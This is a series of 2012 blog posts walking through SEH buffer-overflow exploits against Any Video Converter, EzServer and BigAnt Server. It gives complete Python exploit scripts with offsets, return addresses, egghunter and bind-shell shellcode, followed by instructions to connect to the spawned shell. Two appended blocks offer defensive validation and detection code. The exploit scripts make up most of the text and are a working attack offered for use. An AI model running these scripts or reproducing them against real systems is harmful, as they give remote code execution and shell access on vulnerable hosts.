Sunday, 07 October 2012

Exploit Any Video Converter (Local)



1. Create the fuzzer file, named "fuzzerany.py":

#!/usr/bin/python
# Writes a profiles_v2.xml whose category name is 700 'A' bytes (the crash trigger)
namafile="profiles_v2.xml"
junk = "\x41" * 700
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")
file.write(buff)
print("berhasil yes...")
file.close()

2. Copy the generated file into the Any Video Converter folder, run Any Video Converter, then attach OllyDbg and observe the result; the EIP register looks as shown below.
 
View the SEH chain, press Shift + F9, and this is the result:
 
 
3. Generate a cyclic pattern (pattern create), then find the offset (pattern offset).


4. Search for a POP r32, POP r32, RETN sequence; this is the result:


5. Copy the DVCAPTURE DLL file from Windows to Linux, paste it into the folder root/tmp, and run "./msfpescan".


6. Edit "fuzzerany.py" to become:

#!/usr/bin/python
# Same generator, now with the offset known: 328 bytes reach the nSEH field
namafile="profiles_v2.xml"
junk = "\x90" * 328
junk+="\xcc\xcc\xcc\xcc"   # INT3 breakpoints at nSEH
junk+="\x41\x41\x41\x41"   # placeholder where the SEH handler address will go
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")
file.write(buff)
print("berhasil yes...")
file.close()

7. Finally, add the generated payload: start "msfweb", open a browser at "127.0.0.1:55555", and choose the payload (Microsoft bind shell.sis) as shown below.
 
Once the generated payload appears, edit the file to become:
 
#!/usr/bin/python
namafile="profiles_v2.xml"

junk="\x90"* 328                 # padding up to the nSEH field
junk+="\xeb\x06\x90\x90"         # nSEH: short jump over the handler address
junk+="\x33\xE6\x01\x10"         # SEH: POP POP RETN address found with msfpescan
junk+="\x90" * 16                # NOP sled before the shellcode

shellcode=("\xba\x60\xf6\x4d\x9a\xda\xcc\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x51"
"\x83\xc0\x04\x31\x50\x0e\x03\x30\xf8\xaf\x6f\x4c\x6e\xdb\xdd\x44"
"\x96\xe4\x21\x6b\x09\x90\xb2\xb7\xee\x2d\x0f\x8b\x65\x4d\x95\x8b"
"\x78\x41\x1e\x24\x63\x16\x7e\x9a\x92\xc3\xc8\x51\xa0\x98\xca\x8b"
"\xf8\x5e\x55\xff\x7f\x9e\x12\xf8\xbe\xd5\xd6\x07\x83\x01\x1c\x3c"
"\x57\xf2\xf5\x37\xb2\x71\x5a\x93\x3d\x6d\x03\x50\x31\x3a\x47\x39"
"\x56\xbd\xbc\xc6\x4a\x36\xcb\xa4\xb6\x54\xad\xf7\x86\xbf\x49\x7c"
"\xab\x0f\x19\xc2\x20\xfb\x6d\xde\x95\x70\xcd\xd6\xbb\xee\x40\xa8"
"\x4d\x03\x0c\xcb\x84\xbd\xfe\x55\x41\x71\x33\xf1\xe6\x06\x01\x5e"
"\x5d\x16\xb5\x08\x96\x05\xca\xf3\x78\x29\xe5\x5c\xf0\x30\x6c\xe3"
"\xef\xb3\x73\xb6\x85\xc1\x8c\xe8\x32\x1f\x7b\xfd\x6e\xc8\x83\x2b"
"\x23\xa4\x28\x80\x97\x09\x9c\x65\x4b\x71\xf2\x0f\x03\x9c\xaf\xa9"
"\x80\x17\xae\xa0\x4f\x8c\x2b\xba\x48\x9b\xb4\xec\x3d\x34\x1a\x45"
"\x3d\xe4\xf4\xc1\x6c\x2b\xec\x5e\x90\xe2\xbd\x35\x91\xdb\x2a\x50"
"\x24\x5a\xe3\xcd\x48\xb4\xa4\xa5\xe2\x6c\xba\x95\x98\xe7\xa3\x6c"
"\x59\x8e\x7c\x71\xb3\x24\x7c\x5d\x5a\xad\xe6\x3b\xcb\x52\x8a\x4a"
"\xee\xff\x04\x15\xd8\x33\x2d\x42\x70\x88\xa7\x6e\xb4\xd0\x4b\xc4"
"\x49\x92\x86\xe6\xf4\x3f\x4a\x9b\x83\x07\xc7\x08\xd8\x10\x65\xb0"
"\xac\xf7\x76\x39\x97\x08\x5e\x9a\x40\xa5\x0e\x4d\x3e\x23\xb0\x3c"
"\x91\xe6\xe3\x41\xc1\x61\xa9\x64\xe7\xbf\xe2\x69\x3e\x55\xfa\x6a"
"\x88\x55\xd4\x1f\xa0\x55\x56\xdb\x2b\x59\x8f\xb1\x4c\x75\x58\x4b"
"\x6b\x94\xea\xe0\x74\x8f\xf2\xd6"
)

buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+shellcode+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")
file.write(buff)
print("berhasil yes...")
file.close()

Then run Any Video Converter, and it crashes.

Use telnet or nc from a BackTrack terminal to get into the Windows C: system shell.
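As an added example for the defensive side of this post (it is not code from the post or from the Any Video Converter vendor): the crash comes from an oversized, non-printable category name inside profiles_v2.xml, so a pre-load check of that file is the natural mitigation. The script below scans the raw bytes of every name attribute, then verifies that the file is well-formed XML with the expected shape. The 256-byte limit and the element checks are assumptions for this example; the post gives no real limits. build_profiles_xml only constructs test input in the layout the post's script writes.

```python
import re
import xml.etree.ElementTree as ET

# Assumed policy values for this example (the post gives no real limits):
MAX_NAME_LEN = 256                         # longest category name we accept
RAW_NAME_RE = re.compile(rb'\bname="([^"]*)"')


def check_profiles_xml(data: bytes) -> list:
    """Return a list of findings for a profiles_v2.xml body given as raw bytes.
    An empty list means the file passed every check."""
    findings = []

    # 1. Raw-byte scan first: a crafted file full of NOP bytes and shellcode is
    #    not valid UTF-8, so an XML parser would reject it without saying why.
    for match in RAW_NAME_RE.finditer(data):
        value = match.group(1)
        if len(value) > MAX_NAME_LEN:
            findings.append("name attribute too long: %d bytes" % len(value))
        bad = [b for b in value if b < 0x20 or b > 0x7e]
        if bad:
            findings.append("name attribute has %d non-printable bytes (first 0x%02x)"
                            % (len(bad), bad[0]))

    # 2. Well-formedness and shape: the loader expects <root> with numeric ids.
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        findings.append("not well-formed XML: %s" % exc)
        return findings
    if root.tag != "root":
        findings.append("unexpected root element: %s" % root.tag)
    for cat in root.iter("category"):
        if not cat.get("id", "").isdigit():
            findings.append("category id is not numeric: %r" % cat.get("id"))
    return findings


def build_profiles_xml(name: bytes) -> bytes:
    """Constructed test input in the layout the post's fuzzer writes."""
    return (b'<root>\n<categories>\n<category name="' + name +
            b'" id="0" icon="cat_all.bmp" desc="All Profiles"/>\n'
            b'</categories>\n<groups></groups>\n<profiles></profiles>\n</root>\n')


if __name__ == "__main__":
    for label, name in (("normal", b"All"),
                        ("700 x A", b"A" * 700),
                        ("NOP sled", b"\x90" * 328 + b"\xeb\x06\x90\x90")):
        print(label, check_profiles_xml(build_profiles_xml(name)) or "OK")
```

Running the check on a copy of the file before the application starts (or refusing to load a file that produces findings) stops the crash at the parsing stage; the raw scan runs first so that the report names the actual problem instead of a bare parse error.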
 

Wednesday, 03 October 2012

EzServer PART II

In the last post I did not get into the C: system shell, because there was a problem with the stack calculation. OK, let's go through it again.

1. We did not get past the "telnet" step; this is the solution. Edit our fuzzer file "fuzzereasy.py" to become:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879                      # padding up to the nSEH field
buffer+="\xeb\x06\x90\x90"                # nSEH: short jump over the handler address
buffer+="\x96\x96\x20\x10"                # SEH: POP POP RETN address found with msfpescan
buffer+="\x90" * (5954-len(buffer))       # NOP fill up to 5954 bytes
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()


Then run the fuzzer "fuzzerserver.py".

2. To check whether the calculation is right, we use "calc". Open a browser at "127.0.0.1:55555", choose the payload "windows execute command", and fill in the dialog box as in the picture below.

Click "generate payload"; this is the result:


Then edit our fuzzer file to become:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+=("\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5"
"\xde\x82\x48\x83\xeb\xfc\xe2\xf4\x49\x36\xc6\x48\xb5\xde\x09\x0d"
"\x89\x55\xfe\x4d\xcd\xdf\x6d\xc3\xfa\xc6\x09\x17\x95\xdf\x69\x01"
"\x3e\xea\x09\x49\x5b\xef\x42\xd1\x19\x5a\x42\x3c\xb2\x1f\x48\x45"
"\xb4\x1c\x69\xbc\x8e\x8a\xa6\x4c\xc0\x3b\x09\x17\x91\xdf\x69\x2e"
"\x3e\xd2\xc9\xc3\xea\xc2\x83\xa3\x3e\xc2\x09\x49\x5e\x57\xde\x6c"
"\xb1\x1d\xb3\x88\xd1\x55\xc2\x78\x30\x1e\xfa\x44\x3e\x9e\x8e\xc3"
"\xc5\xc2\x2f\xc3\xdd\xd6\x69\x41\x3e\x5e\x32\x48\xb5\xde\x09\x20"
"\x89\x81\xb3\xbe\xd5\x88\x0b\xb0\x36\x1e\xf9\x18\xdd\x2e\x08\x4c"
"\xea\xb6\x1a\xb6\x3f\xd0\xd5\xb7\x52\xbd\xe3\x24\xd6\xde\x82\x48")
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()


Run EzServer without OllyDbg, and run the fuzzer.


EzServer running before fuzzing:

And after fuzzing:


If the calculator appears, the offset value is correct.

3. Finally, use an egghunter; edit the fuzzer file. Take the payload from the Metasploit Framework and copy the generated payload into the fuzzer file, which becomes:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
#buffer="\x90" * 5879
buffer="\x90" * 5457


hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


payload = ("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")



buffer+= "w00tw00t"              # egg tag the egghunter searches memory for
buffer+= payload                 # shellcode placed right after the tag
buffer+= "\x90" * 70
buffer+= "\xeb\x06\x90\x90"      # nSEH: short jump over the handler address
buffer+= "\x96\x96\x20\x10"      # SEH: POP POP RETN address
buffer+= "\x90" * 16
buffer+= hunt                    # egghunter runs from here and jumps to the payload
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()

Run EzServer.

And this is the result:

Run the fuzzer, then in a terminal type "telnet ip_target port_target".
The picture above shows that we managed to exploit it.
Alhamdulillah

Monday, 01 October 2012

Exploit EZserver

1. Install EzServer and run it on Windows.

2. Create the fuzzer file named "fuzzerserver.py"; this is the script:



3. Run OllyDbg and EzServer, then run the fuzzer from BackTrack; this is the result.
This is the SEH chain; then press Shift + F9.


4. Look for POP, POP, RETN.
Copy "MSVCRTD.DLL" from Windows into the tmp folder on BackTrack and run the msfpescan tool, like this.
Then click View - Executable modules, choose "MSVCRTD.DLL" and double-click it.
Right-click - Search for - and a dialog box appears; type what is shown in the picture,
then click the Find button, and this is the result:


5. Find the offset to overwrite SEH.
Create a pattern, like this example.
After creating the pattern, open the result and copy it into "fuzzerserver.py".
After copying, run EzServer and OllyDbg, then run the fuzzer; you get this result:


Check the SEH chain; this is the result.
Then press Shift + F9, and this is the result.
Compute the pattern offset.

Edit "fuzzerserver.py" to become:
Run EzServer and OllyDbg and run the fuzzer; after fuzzing, check the SEH chain and press Shift + F9.

Press Shift + F9:


Friday, 28 September 2012

Exploit BigAnt Server

1. Install BigAnt and OllyDbg on Windows in VirtualBox.
2. Create the fuzzer file; the author named it "bigant.py". Its content:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "+ "\x41" * 2500 + "\r\n\r\n"    # USV command followed by 2500 'A' bytes
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()



3. Run BigAnt, then OllyDbg; with BigAnt running under OllyDbg, run the fuzzer from BackTrack.

This is the result in the SEH chain.
Then press Shift + F9 so that the data in the SEH chain is passed on into memory.
How do we find the buffer data in memory? Right-click the stack row and choose "file dump".





4. Find the "POP, POP, RETN" address.
Copy vbajet32.dll from Windows into the "tmp" folder on BackTrack.

Next, click View - Executable modules - Search for - Sequence of commands,

and this appears.
After the search, the result appears:
5. Find the offset to overwrite SEH.
Edit "bigantfuzzer.py" to become:
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "

buffer+="*************"+"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

NB: the asterisks stand for the output of pattern create (pattern offset gives the result).
Then run BigAnt and OllyDbg and run the fuzzer; this is the result.
A value of 966 is needed to trigger the SEH handler.

6. Edit "BigAntFuzzer.py" to become:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "

buffer+="\xCC\xCC\xCC\xCC" 
buffer+="\x41\x41\x41\x41" 
buffer+="\x90" * (2504-len(buffer)) 
buffer+=""
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()


Run BigAnt and OllyDbg; after the fuzzer finishes, check the SEH chain, and this is the result.
Press Shift + F9, and this is the result.

Below, this picture shows the dump result.

 

7. Make the shellcode.
The result must not contain any "bad characters".

To check for bad characters:
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "

buffer+="\xCC\xCC\xCC\xCC" 
buffer+="\x41\x41\x41\x41" 
buffer+="\x90" * (2504-len(buffer)) 
buffer+="***********"  # row 1 of the generated payload goes here
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()


Check the bad-character result this way:
run BigAnt and OllyDbg and run the fuzzer. If the SEH chain does not show "vbajet32.dll", something is wrong; otherwise it is fine. If nothing is wrong, edit "bigantfuzzer.py" and add the generated script, as in this example:


#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+= "\x90" * 962            # padding up to the nSEH field (962 + 4 bytes of "USV " = 966)
buffer+= "\xeb\x06\x90\x90"      # nSEH: short jump over the handler address
buffer+= "\x6A\x19\x9A\x0F"      # SEH: POP POP RETN address from vbajet32.dll
buffer+= "\x90" * 16             # NOP sled before the shellcode
buffer+= "\xbe\x1f\x10\xd7\xf0\x29\xc9\xb1\x51\xdb\xc1\xd9\x74\x24\xf4\x5a"
buffer+= "\x31\x72\x0e\x83\xea\xfc\x03\x6d\x1a\x35\x05\x6d\x70\x52\xab\x65"
buffer+="\x7c\x5b\xcb\x8a\x1f\x2f\x58\x50\xc4\xa4\xe4\xa4\x8f\xc7\xe3\xac"
buffer+="\x8e\xd8\x67\x03\x89\xad\x27\xbb\xa8\x5a\x9e\x30\x9e\x17\x21\xa8"
buffer+="\xee\xe7\xba\x98\x95\x28\xc8\xe7\x54\x62\x3c\xe6\x94\x98\xcb\xd3"
buffer+="\x4c\x7b\x1c\x56\x88\x08\x03\xbc\x53\xe4\xda\x37\x5f\xb1\xa9\x18"
buffer+="\x7c\x44\x45\xa5\x50\xcd\x10\xc5\x8c\xcd\x43\xd6\xfc\x36\xe7\x53"
buffer+="\xbd\xf8\x63\x23\x4e\x72\x03\xbf\xe3\x0f\xa4\xb7\xa5\x67\xab\x89"
buffer+="\x57\x94\xe3\xea\xbe\x02\x57\x72\x57\xf8\x65\x12\xd0\x8d\xbb\xbd"
buffer+="\x4a\x8d\x6c\x29\xb8\x9c\x71\x92\x6e\xa0\x5c\xbb\x07\xbb\x07\xc2"
buffer+="\xf5\x4c\xca\x91\x6f\x4f\x35\xc9\x18\x96\xc0\x1c\x75\x7f\x2c\x08"
buffer+="\xd5\xd3\x81\xe7\x89\x90\x76\x44\x7d\xe8\xa9\x2c\xe9\x07\x16\xd6"
buffer+="\xba\xae\x47\x83\x55\x15\x9d\xdb\x62\x02\x5d\xcd\x07\xbd\xf0\xa4"
buffer+="\x28\x6d\x9a\xe2\x7a\xa0\xb2\xbd\x7b\x6b\x17\x14\x7b\x44\xf0\x73"
buffer+="\xca\xe3\x48\x2c\x32\x3d\x1a\x86\x98\x97\x64\xf6\xb2\x70\x7c\x8f"
buffer+="\x72\xf9\xd5\x90\xad\xaf\x26\xbe\x34\x3a\xbd\x58\xd1\xd9\x50\x2d"
buffer+="\xc4\x74\xfb\x74\x2e\x45\x72\x61\x5a\x11\x0c\x8f\xaa\x59\xfd\xe5"
buffer+="\x33\x1b\x2f\x07\x89\xb0\xbc\x7a\x74\xf1\x69\x2f\x22\x69\x1c\xd1"
buffer+="\x86\x7c\x1f\x58\xad\x7f\x09\xf9\x7a\xd2\xe7\xac\xd5\xb8\x06\x1f"
buffer+="\x87\x69\x58\x60\xf7\xfa\xf7\x47\xfd\x34\x54\x88\x28\xa2\xa4\x89"
buffer+="\xe2\xcc\x8b\xfe\x5a\xcf\xaf\xc4\x01\xd0\x66\x96\x36\xfe\xef\x68"
buffer+="\x11\x1d\x9c\xc7\x5e\x34\x9c\x37"

buffer+= "\x90" * (2054-len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()


8. Finally, run BigAnt, run the fuzzer, and then telnet in.
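As an added detection example covering the EzServer posts above and this BigAnt post (written for this page, not code from any post or vendor): each crash is triggered by a single request or command line carrying thousands of bytes of padding, a NOP sled, shellcode and, in the egghunter variant, the tag "w00tw00t". A network sensor or the server's own input layer can flag those traits before the vulnerable parser sees them. The thresholds, the sample payloads and the function name inspect_payload are assumptions for this example; the samples only mirror the shape of the posts' requests.

```python
import re

# Thresholds are assumed policy values for this example, not from the posts:
MAX_LINE_LEN = 1024          # a request/command line longer than this is suspicious
MIN_RUN_LEN = 32             # 32+ identical bytes in a row looks like a NOP sled
NONPRINT_RATIO = 0.10        # more than 10% non-printable bytes is not normal text
KNOWN_TAGS = (b"w00tw00t",)  # egg tag used in the EzServer egghunter post

_RUN_RE = re.compile(rb"(.)\1{%d,}" % (MIN_RUN_LEN - 1), re.DOTALL)


def inspect_payload(data: bytes) -> dict:
    """Score one raw TCP payload (an HTTP request or a BigAnt 'USV ' command)
    and return why it was flagged. 'suspicious' is True when any rule fires."""
    reasons = []
    first_line = data.split(b"\r\n", 1)[0]       # both protocols put the value on line 1
    if len(first_line) > MAX_LINE_LEN:
        reasons.append("first line is %d bytes" % len(first_line))
    run = _RUN_RE.search(data)
    if run:
        reasons.append("run of %d x 0x%02x bytes" % (len(run.group(0)), run.group(1)[0]))
    nonprint = sum(1 for b in data if (b < 0x20 or b > 0x7e) and b not in (0x0d, 0x0a))
    if data and nonprint / len(data) > NONPRINT_RATIO:
        reasons.append("%.0f%% non-printable bytes" % (100.0 * nonprint / len(data)))
    for tag in KNOWN_TAGS:
        if tag in data:
            reasons.append("known egg tag %r" % tag)
    return {"suspicious": bool(reasons), "reasons": reasons}


# Constructed samples: two normal messages and three shaped like the posts' fuzzers.
SAMPLES = {
    "normal http": b"GET /index.html HTTP/1.1\r\nHost: media.example\r\n\r\n",
    "normal bigant": b"USV alice\r\n\r\n",
    "ezserver crash": b"GET /" + b"\x90" * 5879 + b"\r\n\r\n" + b"HTTP/1.1",
    "ezserver egg": b"GET /" + b"\x90" * 40 + b"w00tw00t" + b"\r\n\r\n",
    "bigant crash": b"USV " + b"A" * 2500 + b"\r\n\r\n",
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print("%-15s %s" % (label, inspect_payload(payload)))
```

The rules are deliberately independent so that a hit on any one of them is enough to alert: the BigAnt sample is plain ASCII and trips only the length and run checks, while the egghunter sample is short and trips the run, ratio and tag checks instead.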